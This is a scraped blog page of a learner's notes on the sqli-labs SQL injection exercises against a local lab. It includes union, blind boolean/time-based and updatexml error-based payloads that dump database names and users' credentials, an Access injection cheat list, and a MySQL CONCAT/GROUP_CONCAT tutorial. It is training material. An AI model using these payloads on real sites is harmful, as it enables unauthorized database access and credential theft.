当前位置:网站首页>Safety notes
Safety notes
2022-07-06 09:52:00 【XRSec】
Check the library :
select schema_name from information_schema.schemata
Look up the table :
select table_name from information_schema.tables where table_schema='security'
List :
select column_name from information_schema.columns where table_name='users'
Check field :
select username,password from security.users
sqli-lib practice
less-01: SELECT * FROM users WHERE id='1' LIMIT 0,1; select SELECT limit 0,1; The first one is from the beginning , such as 0 Represents starting from the first , And the second 1 It represents how many data are displayed . SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1 --+ -- # or and A and B True A or B True True id=1 SELECT * FROM users WHERE id='1'' less-01 There are... In the data 3 Column . system_user() user() current_user() database() version() @@datadir @@version_compile_os group_concat() concat_ws('~',A,B) A~B information_schema,challenges,mysql,performance_schema,security,test security emails,referers,uagents,users id,username,password group_concat(concat_ws(0x7e,username,password)) from security.users concat_ws(0x7e,username,password) # admin~password,admin1~pass, '1' 1 ('1') select ascii(substr((select database()),1,1)); select database() security select ascii(substr(security),1,1)); select ascii('s') 115 burpsuite Use : agent security crow_1 if length(select database()) =8; http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+ http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+ ascii(substr((select database()),1,1))> 156 security Dichotomy 1,156 100 http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10 99 --+ select if() select database() substr((select database()),1,1) ascii(substr((select database()),1,1)) select if(ascii(substr((select database()),1,1)) > 10, 2,3); sqli-labs less01-less10 mysql Query statement : Check the library : select schema_name from information_schema.schemata; Look up the table : select table_name from information_schema.tables where table_schema='security'; List : select column_name from information_schema.columns where table_name='users'; Check field : select username,password from security.users; less-11 select 1=1 and 1=2; select 1=1 or 1=2; uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit security uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit summary : less-1 get less-11 post (1) ' ') ')) " ") ")) select * from users where user_id = '1'; select * from users where user_id = '1111 ' or 1=1 # select database(); group_concat(concat(0x7e,username,password)) from security.users ~ username~password less-13 select length(database()); if() length :if(length(database())>1,1,sleep(5)); Database character length is 8 left(database(),1)='a' uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit inf A-Z 0_9 _ less-14 uname=admin " or length(database())='8'#&passwd=admin&submit=Submit A or B A and B uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit less-15 uname=admin&passwd=a' or length(database())='8'#&submit=Submit less-16 13 ('ain') 14 "admin" 15 'ain' 16 ("admin") uname=admin&passwd=admin") and 1=2#&submit=Submit less-17 uname=admin&passwd=afafa'#&submit=Submit select updatexml(1,concat(0x7e,(database())),1); select updatexml(1,concat(0x7e,( Construction statement )),1); Check the library : select schema_name from information_schema.schemata; Look up the table : select table_name from information_schema.tables where table_schema='security'; List : select column_name from information_schema.columns where table_name='users'; Check field : select username,password from security.users; and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1) and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) less-18 INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin') ' or updatexml(1,concat(0x7e,()),1); select updatexml(1,concat(0x7e,(database())),1); ' or updatexml(1,concat(0x7e,(database())),1) or '1'='1 ' or updatexml(1,concat(0x7e,(database())),1), '','')# ' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')# ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')# ' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')# ' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#
16 Base number
0x + Hex Encode
Manual injection
2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' // Return to normal ,access Database 2%'and(select count(*)from admin_user)>0 and '%'=' // Return to normal , There is admin_user surface 2%'and(select count(username)from admin_user)>0 and '%'=' // Return to normal , There is username Field 2%'and(select count(password)from admin_user)>0 and '%'=' // Return to normal , There is password Field 2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' // Return to normal ,username The length is greater than 4
Mysql in concat()、concat_ws() and group_concat() Usage of
One 、CONCAT() function
CONCAT()
Function is used to connect multiple strings into one string . Using data tables Info As an example , among SELECT id,name FROM info LIMIT 1;
The return result of is
+----+--------+ | id | name | +----+--------+ | 1 | BioCyc | +----+--------+
1、 Grammar and usage characteristics :
CONCAT(str1,str2,…)
The return result is the string generated by the connection parameter . If any parameter is NULL , The return value is NULL. There can be one or more parameters .
2、 Examples of use :
SELECT CONCAT(id, ‘,’, name) AS con FROM info LIMIT 1; $ The return result is +----------+ | con | +----------+ | 1,BioCyc | +----------+
SELECT CONCAT(‘My’, NULL, ‘QL’); # The return result is +--------------------------+ | CONCAT('My', NULL, 'QL') | +--------------------------+ | NULL | +--------------------------+
3、 How to specify the separator between parameters
Using functions
CONCAT_WS()
. The syntax is :CONCAT_WS(separator,str1,str2,…)
CONCAT_WS()
representativeCONCAT With Separator
, yesCONCAT()
A special form of . The first parameter is the separator for the other parameters . The position of the separator is placed between the two strings to be connected . The separator can be a string , It can also be other parameters . If the separator isNULL
, The result isNULL
. The function ignores the... After any separator argumentNULL
value . howeverCONCAT_WS()
No empty strings will be ignored . ( However, we will ignore all of themNULL
).
Such as SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1; The return result is +----------+ | con_ws | +----------+ | 1_BioCyc | +----------+ SELECT CONCAT_WS(',','First name',NULL,'Last Name'); The return result is +----------------------------------------------+ | CONCAT_WS(',','First name',NULL,'Last Name') | +----------------------------------------------+ | First name,Last Name | +----------------------------------------------+
Two 、GROUP_CONCAT() function
GROUP_CONCAT Function returns a string result , The result is a combination of values in the group . Use table info As an example , The sentence
SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764'); The return result of is +----------+----+--------------------------+ | locus | id | journal | +----------+----+--------------------------+ | AB086827 | 1 | Unpublished | | AB086827 | 2 | Submitted (20-JUN-2002) | | AF040764 | 23 | Unpublished | | AF040764 | 24 | Submitted (31-DEC-1997) | +----------+----+--------------------------+
1、 Use grammar and features :
GROUP_CONCAT([DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]] [SEPARATOR str_val])
stay
MySQL
in , You can get the join value of the expression combo . By usingDISTINCT
You can exclude duplicate values . If you want to sort the values in the results , have access toORDER BY
Clause .SEPARATOR
Is a string value , It is used to insert into the result value . The default is a comma (","
), You can specifySEPARATOR ""
Remove the separator completely . You can go through the variablesgroup_concat_max_len
Set a maximum length . The syntax executed at run time is as follows :SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
If the maximum length is set , The resulting value is clipped to this maximum length . If the grouping character is too long , The system parameters can be set :SET @@global.group_concat_max_len=40000;
2、 Examples of use :
sentence SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result of is
+----------+------------------+ | locus | GROUP_CONCAT(id) | +----------+------------------+ | AB086827 | 1,2 | | AF040764 | 23,24 | +----------+------------------+
sentence SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result of is
+----------+----------------------------------------------------------+ | locus | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') | +----------+----------------------------------------------------------+ | AB086827 | 2_1 | | AF040764 | 24_23 | +----------+----------------------------------------------------------+
sentence SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result of is
+----------+--------------------------------------------------------------------------+ | locus | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') | +----------+--------------------------------------------------------------------------+ | AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished | | AF040764 | 24, Submitted (31-DEC-1997) . 23, Unpublished | +----------+--------------------------------------------------------------------------
边栏推荐
- Regular expressions are actually very simple
- 018. Valid palindromes
- 零基础学习单片机切记这四点要求,少走弯路
- CAP理论
- Contrôle de l'exécution du module d'essai par panneau dans Canoe (primaire)
- Tianmu MVC audit I
- 竞赛vscode配置指南
- CAPL 脚本对.ini 配置文件的高阶操作
- How can I take a shortcut to learn C language in college
- May brush question 27 - figure
猜你喜欢
嵌入式开发中的防御性C语言编程
嵌入式開發中的防禦性C語言編程
Mapreduce实例(九):Reduce端join
Contrôle de l'exécution du module d'essai par panneau dans Canoe (primaire)
【深度学习】语义分割:论文阅读(NeurIPS 2021)MaskFormer: per-pixel classification is not all you need
CANoe仿真功能之自动化序列(Automation Sequences )
MapReduce instance (IV): natural sorting
max-flow min-cut
MapReduce instance (VII): single table join
【深度學習】語義分割-源代碼匯總
随机推荐
CANoe仿真功能之自动化序列(Automation Sequences )
Une grande vague d'attaques à la source ouverte
068.查找插入位置--二分查找
May brush question 27 - figure
Take you back to spark ecosystem!
面试突击62:group by 有哪些注意事项?
How can I take a shortcut to learn C language in college
CAPL 脚本对.ini 配置文件的高阶操作
Combined search /dfs solution - leetcode daily question - number of 1020 enclaves
有软件负载均衡,也有硬件负载均衡,选择哪个?
发生OOM了,你知道是什么原因吗,又该怎么解决呢?
为什么要数据分层
学习单片机对社会的帮助是很大的
Control the operation of the test module through the panel in canoe (primary)
解决小文件处过多
Meituan Er Mian: why does redis have sentinels?
Redis分布式锁实现Redisson 15问
C#/. Net phase VI 01C Foundation_ 01: running environment, process of creating new C program, strict case sensitivity, meaning of class library
VH6501学习系列文章
Why can't TN-C use 2p circuit breaker?